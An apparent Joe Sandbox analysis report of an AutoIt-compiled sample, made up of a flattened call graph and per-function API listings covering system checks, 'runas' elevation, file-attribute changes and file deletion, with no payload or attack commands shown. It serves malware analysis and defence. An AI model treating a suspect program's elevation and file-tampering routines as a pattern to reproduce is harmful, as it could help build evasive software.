101082->101049 101083 c53789 101083->101074 101086 c93e14 101102 c538f2 60 API calls ___scrt_fastfail 101086->101102 101089 c6fcd3 ___scrt_fastfail 101088->101089 101090 c6fd59 101088->101090 101105 c55f59 101089->101105 101090->101074 101092 c6fd42 KillTimer SetTimer 101092->101090 101093 c6fcfa 101093->101092 101094 cafdcb Shell_NotifyIconW 101093->101094 101094->101092 101095->101077 101096->101074 101097->101083 101098->101074 101099->101061 101100->101073 101101->101086 101102->101082 101103->101082 101104->101066 101106 c55f76 101105->101106 101125 c56058 101105->101125 101107 c57a14 8 API calls 101106->101107 101108 c55f84 101107->101108 101109 c55f91 101108->101109 101110 c95101 LoadStringW 101108->101110 101111 c584b7 8 API calls 101109->101111 101114 c9511b 101110->101114 101112 c55fa6 101111->101112 101113 c55fb3 101112->101113 101121 c95137 101112->101121 101113->101114 101115 c55fbd 101113->101115 101116 c5be6d 8 API calls 101114->101116 101118 c55fd9 ___scrt_fastfail 101114->101118 101117 c565a4 8 API calls 101115->101117 101116->101118 101119 c55fcb 101117->101119 101123 c5603e Shell_NotifyIconW 101118->101123 101120 c57af4 8 API calls 101119->101120 101120->101118 101121->101118 101122 c9517a 101121->101122 101124 c5bf07 8 API calls 101121->101124 101136 c6fe8f 51 API calls 101122->101136 101123->101125 101126 c95161 101124->101126 101125->101093 101135 cba265 9 API calls 101126->101135 101129 c95199 101131 c565a4 8 API calls 101129->101131 101130 c9516c 101132 c57af4 8 API calls 101130->101132 101133 c951aa 101131->101133 101132->101122 101134 c565a4 8 API calls 101133->101134 101134->101118 101135->101130 101136->101129 101137 ca3fb3 101153 c5ee60 messages 101137->101153 101138 c5f1c1 PeekMessageW 101138->101153 101139 c5eeb7 GetInputState 101139->101138 101139->101153 101141 ca3271 TranslateAcceleratorW 101141->101153 101142 c5f0b4 timeGetTime 101142->101153 101143 c5f223 TranslateMessage DispatchMessageW 101144 c5f23f PeekMessageW 101143->101144 101144->101153 101145 c5f25f Sleep 101145->101153 101146 ca4127 Sleep 101160 ca4004 101146->101160 101148 ca338d timeGetTime 101205 c6a9e5 9 API calls 101148->101205 101151 cbdc9c 46 API calls 101151->101160 101152 ca41be GetExitCodeProcess 101155 ca41ea CloseHandle 101152->101155 101156 ca41d4 WaitForSingleObject 101152->101156 101153->101138 101153->101139 101153->101141 101153->101142 101153->101143 101153->101144 101153->101145 101153->101146 101153->101148 101158 c5f085 101153->101158 101153->101160 101166 c602f0 253 API calls 101153->101166 101167 c62ad0 253 API calls 101153->101167 101169 c5f400 101153->101169 101176 c5f680 101153->101176 101199 c6f2a5 101153->101199 101204 c6f27e timeGetTime 101153->101204 101206 cc4384 8 API calls 101153->101206 101207 cc3ef6 81 API calls __wsopen_s 101153->101207 101154 ce331e GetForegroundWindow 101154->101160 101155->101160 101156->101153 101156->101155 101159 ca3cf5 101159->101158 101160->101151 101160->101152 101160->101153 101160->101154 101160->101159 101161 ca425c Sleep 101160->101161 101208 cd5fb5 8 API calls 101160->101208 101209 cbf1a7 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 101160->101209 101210 c6f27e timeGetTime 101160->101210 101161->101153 101166->101153 101167->101153 101170 c5f433 101169->101170 101171 c5f41f 101169->101171 101243 cc3ef6 81 API calls __wsopen_s 101170->101243 101211 c5e910 101171->101211 101174 c5f42a 101174->101153 101175 ca4528 101175->101175 101177 c5f6c0 101176->101177 101187 c5f78c messages 101177->101187 101252 c705d2 5 API calls __Init_thread_wait 101177->101252 101180 ca457d 101182 c5bf07 8 API calls 101180->101182 101180->101187 101181 c5bf07 8 API calls 101181->101187 101183 ca4597 101182->101183 101253 c70433 29 API calls __onexit 101183->101253 101184 c5bdc1 39 API calls 101184->101187 101187->101181 101187->101184 101191 c602f0 253 API calls 101187->101191 101193 c5be6d 8 API calls 101187->101193 101194 c61c50 8 API calls 101187->101194 101195 cc3ef6 81 API calls 101187->101195 101196 c5fa91 101187->101196 101251 c6b2d6 253 API calls 101187->101251 101255 c705d2 5 API calls __Init_thread_wait 101187->101255 101256 c70433 29 API calls __onexit 101187->101256 101257 c70588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 101187->101257 101258 cd5131 101 API calls 101187->101258 101259 cd721e 253 API calls 101187->101259 101188 ca45a1 101254 c70588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 101188->101254 101191->101187 101193->101187 101194->101187 101195->101187 101196->101153 101200 c6f2b8 101199->101200 101202 c6f2c1 101199->101202 101200->101153 101201 c6f2e5 IsDialogMessageW 101201->101200 101201->101202 101202->101200 101202->101201 101203 caf83b GetClassLongW 101202->101203 101203->101201 101203->101202 101204->101153 101205->101153 101206->101153 101207->101153 101208->101160 101209->101160 101210->101160 101212 c602f0 253 API calls 101211->101212 101214 c5e94d 101211->101214 101212->101214 101215 c5e9bb messages 101214->101215 101216 c5ed85 101214->101216 101217 c5ea73 101214->101217 101223 c5eb68 101214->101223 101226 c7016b 8 API calls 101214->101226 101229 ca3176 101214->101229 101238 c5ead9 __fread_nolock messages 101214->101238 101215->101174 101216->101215 101227 c7019b 8 API calls 101216->101227 101217->101216 101219 c5ea7e 101217->101219 101218 c5ecaf 101221 c5ecc4 101218->101221 101222 ca3167 101218->101222 101220 c7016b 8 API calls 101219->101220 101233 c5ea85 __fread_nolock 101220->101233 101224 c7016b 8 API calls 101221->101224 101249 cd6062 8 API calls 101222->101249 101228 c7019b 8 API calls 101223->101228 101235 c5eb1a 101224->101235 101226->101214 101227->101233 101228->101238 101250 cc3ef6 81 API calls __wsopen_s 101229->101250 101230 c7016b 8 API calls 101231 c5eaa6 101230->101231 101231->101238 101244 c5d210 253 API calls 101231->101244 101233->101230 101233->101231 101234 ca3156 101248 cc3ef6 81 API calls __wsopen_s 101234->101248 101235->101174 101238->101218 101238->101234 101238->101235 101239 ca3131 101238->101239 101241 ca310f 101238->101241 101245 c54485 253 API calls 101238->101245 101247 cc3ef6 81 API calls __wsopen_s 101239->101247 101246 cc3ef6 81 API calls __wsopen_s 101241->101246 101243->101175 101244->101238 101245->101238 101246->101235 101247->101235 101248->101235 101249->101229 101250->101215 101251->101187 101252->101180 101253->101188 101254->101187 101255->101187 101256->101187 101257->101187 101258->101187 101259->101187 101260 c88792 101265 c8854e 101260->101265 101263 c887ba 101269 c8857f try_get_first_available_module 101265->101269 101267 c8877e 101281 c82b7c 26 API calls __wsopen_s 101267->101281 101271 c7919b 40 API calls 101269->101271 101276 c886c8 101269->101276 101270 c886d3 101270->101263 101277 c90d24 101270->101277 101272 c8871c 101271->101272 101273 c7919b 40 API calls 101272->101273 101272->101276 101274 c8873b 101273->101274 101275 c7919b 40 API calls 101274->101275 101274->101276 101275->101276 101276->101270 101280 c7f669 20 API calls __dosmaperr 101276->101280 101282 c90421 101277->101282 101279 c90d3f 101279->101263 101280->101267 101281->101270 101283 c9042d __FrameHandler3::FrameUnwindToState 101282->101283 101284 c9043b 101283->101284 101286 c90474 101283->101286 101340 c7f669 20 API calls __dosmaperr 101284->101340 101293 c909fb 101286->101293 101287 c90440 101341 c82b7c 26 API calls __wsopen_s 101287->101341 101292 c9044a __wsopen_s 101292->101279 101343 c907cf 101293->101343 101296 c90a2d 101375 c7f656 20 API calls __dosmaperr 101296->101375 101297 c90a46 101361 c855b1 101297->101361 101300 c90a32 101376 c7f669 20 API calls __dosmaperr 101300->101376 101301 c90a4b 101302 c90a6b 101301->101302 101303 c90a54 101301->101303 101374 c9073a CreateFileW 101302->101374 101377 c7f656 20 API calls __dosmaperr 101303->101377 101307 c90a59 101378 c7f669 20 API calls __dosmaperr 101307->101378 101309 c90b21 GetFileType 101311 c90b2c GetLastError 101309->101311 101312 c90b73 101309->101312 101310 c90af6 GetLastError 101380 c7f633 20 API calls __dosmaperr 101310->101380 101381 c7f633 20 API calls __dosmaperr 101311->101381 101383 c854fa 21 API calls 2 library calls 101312->101383 101313 c90aa4 101313->101309 101313->101310 101379 c9073a CreateFileW 101313->101379 101316 c90b3a CloseHandle 101316->101300 101318 c90b63 101316->101318 101382 c7f669 20 API calls __dosmaperr 101318->101382 101320 c90ae9 101320->101309 101320->101310 101322 c90b94 101327 c90be0 101322->101327 101384 c9094b 72 API calls 3 library calls 101322->101384 101323 c90b68 101323->101300 101326 c90c06 101328 c90c0d 101326->101328 101329 c90c1e 101326->101329 101327->101328 101385 c904ed 72 API calls 4 library calls 101327->101385 101386 c88a3e 101328->101386 101331 c90498 101329->101331 101332 c90c9c CloseHandle 101329->101332 101342 c904c1 LeaveCriticalSection __wsopen_s 101331->101342 101401 c9073a CreateFileW 101332->101401 101334 c90cc7 101335 c90cd1 GetLastError 101334->101335 101336 c90cfd 101334->101336 101402 c7f633 20 API calls __dosmaperr 101335->101402 101336->101331 101338 c90cdd 101403 c856c3 21 API calls 2 library calls 101338->101403 101340->101287 101341->101292 101342->101292 101344 c907f0 101343->101344 101351 c9080a 101343->101351 101344->101351 101411 c7f669 20 API calls __dosmaperr 101344->101411 101346 c90842 101350 c90871 101346->101350 101413 c7f669 20 API calls __dosmaperr 101346->101413 101348 c907ff 101412 c82b7c 26 API calls __wsopen_s 101348->101412 101358 c908c4 101350->101358 101415 c7da9d 26 API calls 2 library calls 101350->101415 101404 c9075f 101351->101404 101354 c908bf 101356 c9093e 101354->101356 101354->101358 101355 c90866 101414 c82b7c 26 API calls __wsopen_s 101355->101414 101416 c82b8c 11 API calls _abort 101356->101416 101358->101296 101358->101297 101360 c9094a 101362 c855bd __FrameHandler3::FrameUnwindToState 101361->101362 101419 c832ee EnterCriticalSection 101362->101419 101364 c855e9 101423 c85390 21 API calls 3 library calls 101364->101423 101365 c855c4 101365->101364 101370 c85657 EnterCriticalSection 101365->101370 101372 c8560b 101365->101372 101368 c85634 __wsopen_s 101368->101301 101369 c855ee 101369->101372 101424 c854d7 EnterCriticalSection 101369->101424 101371 c85664 LeaveCriticalSection 101370->101371 101370->101372 101371->101365 101420 c856ba 101372->101420 101374->101313 101375->101300 101376->101331 101377->101307 101378->101300 101379->101320 101380->101300 101381->101316 101382->101323 101383->101322 101384->101327 101385->101326 101387 c85754 __wsopen_s 26 API calls 101386->101387 101388 c88a4e 101387->101388 101389 c88a54 101388->101389 101393 c85754 __wsopen_s 26 API calls 101388->101393 101400 c88a86 101388->101400 101426 c856c3 21 API calls 2 library calls 101389->101426 101391 c85754 __wsopen_s 26 API calls 101394 c88a92 CloseHandle 101391->101394 101392 c88aac 101395 c88ace 101392->101395 101427 c7f633 20 API calls __dosmaperr 101392->101427 101396 c88a7d 101393->101396 101394->101389 101397 c88a9e GetLastError 101394->101397 101395->101331 101399 c85754 __wsopen_s 26 API calls 101396->101399 101397->101389 101399->101400 101400->101389 101400->101391 101401->101334 101402->101338 101403->101336 101407 c90777 101404->101407 101405 c90792 101405->101346 101407->101405 101417 c7f669 20 API calls __dosmaperr 101407->101417 101408 c907b6 101418 c82b7c 26 API calls __wsopen_s 101408->101418 101410 c907c1 101410->101346 101411->101348 101412->101351 101413->101355 101414->101350 101415->101354 101416->101360 101417->101408 101418->101410 101419->101365 101425 c83336 LeaveCriticalSection 101420->101425 101422 c856c1 101422->101368 101423->101369 101424->101372 101425->101422 101426->101392 101427->101395 101428 c51098 101433 c55d78 101428->101433 101432 c510a7 101434 c5bf07 8 API calls 101433->101434 101435 c55d8f GetVersionExW 101434->101435 101436 c584b7 8 API calls 101435->101436 101437 c55ddc 101436->101437 101438 c596d9 8 API calls 101437->101438 101447 c55e12 101437->101447 101439 c55e06 101438->101439 101441 c579ed 8 API calls 101439->101441 101440 c55ecc GetCurrentProcess IsWow64Process 101442 c55ee8 101440->101442 101441->101447 101443 c55f00 LoadLibraryA 101442->101443 101444 c950f2 GetSystemInfo 101442->101444 101445 c55f11 GetProcAddress 101443->101445 101446 c55f4d GetSystemInfo 101443->101446 101445->101446 101449 c55f21 GetNativeSystemInfo 101445->101449 101450 c55f27 101446->101450 101447->101440 101448 c950ad 101447->101448 101449->101450 101451 c5109d 101450->101451 101452 c55f2b FreeLibrary 101450->101452 101453 c70433 29 API calls __onexit 101451->101453 101452->101451 101453->101432 101454 c5105b 101459 c5522e 101454->101459 101456 c5106a 101490 c70433 29 API calls __onexit 101456->101490 101458 c51074 101460 c5523e __wsopen_s 101459->101460 101461 c5bf07 8 API calls 101460->101461 101462 c552f4 101461->101462 101463 c5551b 10 API calls 101462->101463 101464 c552fd 101463->101464 101491 c551bf 101464->101491 101467 c565a4 8 API calls 101468 c55316 101467->101468 101469 c5684e 8 API calls 101468->101469 101470 c55325 101469->101470 101471 c5bf07 8 API calls 101470->101471 101472 c5532e 101471->101472 101473 c5bceb 8 API calls 101472->101473 101474 c55337 RegOpenKeyExW 101473->101474 101475 c94bc0 RegQueryValueExW 101474->101475 101479 c55359 101474->101479 101476 c94bdd 101475->101476 101477 c94c56 RegCloseKey 101475->101477 101478 c7019b 8 API calls 101476->101478 101477->101479 101485 c94c68 _wcslen 101477->101485 101480 c94bf6 101478->101480 101479->101456 101481 c541a6 8 API calls 101480->101481 101482 c94c01 RegQueryValueExW 101481->101482 101483 c94c1e 101482->101483 101487 c94c38 messages 101482->101487 101484 c584b7 8 API calls 101483->101484 101484->101487 101485->101479 101486 c5627c 8 API calls 101485->101486 101488 c5b25f 8 API calls 101485->101488 101489 c5684e 8 API calls 101485->101489 101486->101485 101487->101477 101488->101485 101489->101485 101490->101458 101492 c922f0 __wsopen_s 101491->101492 101493 c551cc GetFullPathNameW 101492->101493 101494 c551ee 101493->101494 101495 c584b7 8 API calls 101494->101495 101496 c5520c 101495->101496 101496->101467 101497 ca55f4 101498 c6e34f 8 API calls 101497->101498 101499 ca560a 101498->101499 101503 ca5685 101499->101503 101506 c6a9e5 9 API calls 101499->101506 101501 ca5665 101501->101503 101507 cc2393 8 API calls 101501->101507 101504 ca617b 101503->101504 101508 cc3ef6 81 API calls __wsopen_s 101503->101508 101506->101501 101507->101503 101508->101504

                                                              Executed Functions

                                                              Function 00C55D78 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 515 c55d78-c55de7 call c5bf07 GetVersionExW call c584b7 520 c94f0c-c94f1f 515->520 521 c55ded 515->521 523 c94f20-c94f24 520->523 522 c55def-c55df1 521->522 526 c94f4b 522->526 527 c55df7-c55e56 call c596d9 call c579ed 522->527 524 c94f27-c94f33 523->524 525 c94f26 523->525 524->523 528 c94f35-c94f37 524->528 525->524 531 c94f52-c94f5e 526->531 540 c950ad-c950b4 527->540 541 c55e5c-c55e5e 527->541 528->522 530 c94f3d-c94f44 528->530 530->520 533 c94f46 530->533 534 c55ecc-c55ee6 GetCurrentProcess IsWow64Process 531->534 533->526 536 c55f45-c55f4b 534->536 537 c55ee8 534->537 539 c55eee-c55efa 536->539 537->539 542 c55f00-c55f0f LoadLibraryA 539->542 543 c950f2-c950f6 GetSystemInfo 539->543 546 c950d4-c950d7 540->546 547 c950b6 540->547 544 c55e64-c55e67 541->544 545 c94fae-c94fc1 541->545 551 c55f11-c55f1f GetProcAddress 542->551 552 c55f4d-c55f57 GetSystemInfo 542->552 544->534 553 c55e69-c55eab 544->553 554 c94fea-c94fec 545->554 555 c94fc3-c94fcc 545->555 549 c950d9-c950e8 546->549 550 c950c2-c950ca 546->550 548 c950bc 547->548 548->550 549->548 561 c950ea-c950f0 549->561 550->546 551->552 562 c55f21-c55f25 GetNativeSystemInfo 551->562 563 c55f27-c55f29 552->563 553->534 556 c55ead-c55eb0 553->556 559 c94fee-c95003 554->559 560 c95021-c95024 554->560 557 c94fd9-c94fe5 555->557 558 c94fce-c94fd4 555->558 564 c55eb6-c55ec0 556->564 565 c94f63-c94f6d 556->565 557->534 558->534 566 c95010-c9501c 559->566 567 c95005-c9500b 559->567 568 c9505f-c95062 560->568 569 c95026-c95041 560->569 561->550 562->563 570 c55f32-c55f44 563->570 571 c55f2b-c55f2c FreeLibrary 563->571 564->531 572 c55ec6 564->572 575 c94f6f-c94f7b 565->575 576 c94f80-c94f8a 565->576 566->534 567->534 568->534 577 c95068-c9508f 568->577 573 c9504e-c9505a 569->573 574 c95043-c95049 569->574 571->570 572->534 573->534 574->534 575->534 578 c94f9d-c94fa9 576->578 579 c94f8c-c94f98 576->579 580 c9509c-c950a8 577->580 581 c95091-c95097 577->581 578->534 579->534 580->534 581->534
                                                              APIs
                                                              • GetVersionExW.KERNEL32(?), ref: 00C55DA7
                                                                • Part of subcall function 00C584B7: _wcslen.LIBCMT ref: 00C584CA
                                                              • GetCurrentProcess.KERNEL32(?,00CEDC2C,00000000,?,?), ref: 00C55ED3
                                                              • IsWow64Process.KERNEL32(00000000,?,?), ref: 00C55EDA
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00C55F05
                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00C55F17
                                                              • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00C55F25
                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 00C55F2C
                                                              • GetSystemInfo.KERNEL32(?,?,?), ref: 00C55F51
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                              • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                              • API String ID: 3290436268-3101561225
                                                              • Opcode ID: 58eea4fd76fd6b3ebebf0f8f0bc88bc9ab51fc92dbbda7637fb0558bbf36b548
                                                              • Instruction ID: 8f3fea80c5477adeb37d043907ffef619f3560f924d0a4f6fdbb59dbf78fcf98
                                                              • Opcode Fuzzy Hash: 58eea4fd76fd6b3ebebf0f8f0bc88bc9ab51fc92dbbda7637fb0558bbf36b548
                                                              • Instruction Fuzzy Hash: 73A1A23680A7C1EFCB36CBA97C455B97FA46B36301B04589DF891D7321C26D4A8ACB35
                                                              Function 00CC9F9F Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 582 cc9f9f-cc9fc7 FindFirstFileW 583 cc9fc9-cc9fde call c755c2 582->583 584 cca03a-cca045 FindClose 582->584 593 cca028-cca038 FindNextFileW 583->593 594 cc9fe0-cc9ff5 call c755c2 583->594 585 cca04b-cca05e FindFirstFileW 584->585 586 cca0e2 584->586 588 cca0d9 585->588 589 cca060-cca066 585->589 590 cca0e4-cca0e8 586->590 595 cca0db-cca0dc FindClose 588->595 592 cca069-cca070 589->592 596 cca0c7-cca0d7 FindNextFileW 592->596 597 cca072-cca087 call c755c2 592->597 593->583 593->584 594->593 602 cc9ff7-cca020 GetFileAttributesW SetFileAttributesW 594->602 595->586 596->588 596->592 597->596 603 cca089-cca09e call c755c2 597->603 604 cca0eb-cca0f4 FindClose 602->604 605 cca026 602->605 603->596 608 cca0a0-cca0be SetCurrentDirectoryW call cc9f9f 603->608 604->590 605->593 611 cca0f6-cca0f8 608->611 612 cca0c0-cca0c5 SetCurrentDirectoryW 608->612 611->595 612->596
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,?,771A8FB0,?,00000000), ref: 00CC9FC0
                                                              • GetFileAttributesW.KERNELBASE(?), ref: 00CC9FFE
                                                              • SetFileAttributesW.KERNELBASE(?,?), ref: 00CCA018
                                                              • FindNextFileW.KERNELBASE(00000000,?), ref: 00CCA030
                                                              • FindClose.KERNEL32(00000000), ref: 00CCA03B
                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00CCA057
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00CCA0A7
                                                              • SetCurrentDirectoryW.KERNEL32(00D17B94), ref: 00CCA0C5
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CCA0CF
                                                              • FindClose.KERNEL32(00000000), ref: 00CCA0DC
                                                              • FindClose.KERNEL32(00000000), ref: 00CCA0EC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                              • String ID: *.*
                                                              • API String ID: 1409584000-438819550
                                                              • Opcode ID: bba07cfbdd9c5a7febf8436f7baae7ea1971949a900d03180ac9aa75c7d6fe12
                                                              • Instruction ID: 6110ef7a4a82e1436ac05a0cf05bc7d173c54da98074d392facdfe631a8bff89
                                                              • Opcode Fuzzy Hash: bba07cfbdd9c5a7febf8436f7baae7ea1971949a900d03180ac9aa75c7d6fe12
                                                              • Instruction Fuzzy Hash: D831C33260025D7FDB109FB5EC4DFDE73ACAF053A4F104159E916E60A0DB75DE849A22
                                                              Function 00C53312 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 148windowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00C532EF,?), ref: 00C53342
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00C532EF,?), ref: 00C53355
                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,00D22418,00D22400,?,?,?,?,?,?,00C532EF,?), ref: 00C533C1
                                                                • Part of subcall function 00C584B7: _wcslen.LIBCMT ref: 00C584CA
                                                                • Part of subcall function 00C541E6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00C533E9,00D22418,?,?,?,?,?,?,?,00C532EF,?), ref: 00C54227
                                                              • SetCurrentDirectoryW.KERNELBASE(?,00000001,00D22418,?,?,?,?,?,?,?,00C532EF,?), ref: 00C53442
                                                              • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00C93C8A
                                                              • SetCurrentDirectoryW.KERNEL32(?,00D22418,?,?,?,?,?,?,?,00C532EF,?), ref: 00C93CCB
                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00D131F4,00D22418,?,?,?,?,?,?,?,00C532EF), ref: 00C93D54
                                                              • ShellExecuteW.SHELL32(00000000,?,?), ref: 00C93D5B
                                                                • Part of subcall function 00C5345A: GetSysColorBrush.USER32(0000000F), ref: 00C53465
                                                                • Part of subcall function 00C5345A: LoadCursorW.USER32(00000000,00007F00), ref: 00C53474
                                                                • Part of subcall function 00C5345A: LoadIconW.USER32(00000063), ref: 00C5348A
                                                                • Part of subcall function 00C5345A: LoadIconW.USER32(000000A4), ref: 00C5349C
                                                                • Part of subcall function 00C5345A: LoadIconW.USER32(000000A2), ref: 00C534AE
                                                                • Part of subcall function 00C5345A: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C534C6
                                                                • Part of subcall function 00C5345A: RegisterClassExW.USER32(?), ref: 00C53517
                                                                • Part of subcall function 00C5353A: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,VARGETTYPE,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C53568
                                                                • Part of subcall function 00C5353A: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C53589
                                                                • Part of subcall function 00C5353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,00C532EF,?), ref: 00C5359D
                                                                • Part of subcall function 00C5353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,00C532EF,?), ref: 00C535A6
                                                                • Part of subcall function 00C538F2: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C539C3
                                                              Strings
                                                              • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00C93C84
                                                              • runas, xrefs: 00C93D4F
                                                              • AutoIt, xrefs: 00C93C7F
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                              • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                              • API String ID: 683915450-2030392706
                                                              • Opcode ID: fea62f30b7a038e0fd4c2caaa1153f59441c635995478235d42ae98a0b1e0c8a
                                                              • Instruction ID: 57452d8194a35161a527a5d0a1d1518ebca0e75e6d7f1b62582311fc1277d912
                                                              • Opcode Fuzzy Hash: fea62f30b7a038e0fd4c2caaa1153f59441c635995478235d42ae98a0b1e0c8a
                                                              • Instruction Fuzzy Hash: AD51E934108385BEC715FF60EC5597E7BA49BA4745F40051CF891962A2DB348BCEE736
                                                              Function 00CBD836 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1336 cbd836-cbd894 call c5bf07 * 3 call c5557e * 2 call cbe958 call cbe9c5 1351 cbd89f-cbd8a9 call cbe9c5 1336->1351 1352 cbd896-cbd89a call c565a4 1336->1352 1356 cbd8ab-cbd8af call c565a4 1351->1356 1357 cbd8b4-cbd8f2 call c5bf07 * 2 call c5694e FindFirstFileW 1351->1357 1352->1351 1356->1357 1365 cbd8f8 1357->1365 1366 cbda23-cbda2a FindClose 1357->1366 1368 cbd8fe-cbd900 1365->1368 1367 cbda2d-cbda5b call c5bd2c * 5 1366->1367 1368->1366 1370 cbd906-cbd90d 1368->1370 1372 cbd9ef-cbda02 FindNextFileW 1370->1372 1373 cbd913-cbd979 call c5b25f call cbdf85 call c5bd2c call c57af4 call c565a4 call cbdc8e 1370->1373 1372->1368 1376 cbda08-cbda0d 1372->1376 1395 cbd97b-cbd97e 1373->1395 1396 cbd99f-cbd9a3 1373->1396 1376->1368 1397 cbda12-cbda21 FindClose call c5bd2c 1395->1397 1398 cbd984-cbd99b call c6e2e5 1395->1398 1399 cbd9d1-cbd9d7 call cbda5c 1396->1399 1400 cbd9a5-cbd9a8 1396->1400 1397->1367 1407 cbd9ad-cbd9b6 MoveFileW 1398->1407 1413 cbd99d DeleteFileW 1398->1413 1409 cbd9dc 1399->1409 1404 cbd9aa 1400->1404 1405 cbd9b8-cbd9c8 call cbda5c 1400->1405 1404->1407 1405->1397 1414 cbd9ca-cbd9cf DeleteFileW 1405->1414 1411 cbd9df-cbd9e1 1407->1411 1409->1411 1411->1397 1415 cbd9e3-cbd9eb call c5bd2c 1411->1415 1413->1396 1414->1411 1415->1372
                                                              APIs
                                                                • Part of subcall function 00C5557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C55558,?,?,00C94B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00C5559E
                                                                • Part of subcall function 00CBE9C5: GetFileAttributesW.KERNELBASE(?,00CBD755), ref: 00CBE9C6
                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00CBD8E2
                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00CBD99D
                                                              • MoveFileW.KERNEL32(?,?), ref: 00CBD9B0
                                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 00CBD9CD
                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00CBD9F7
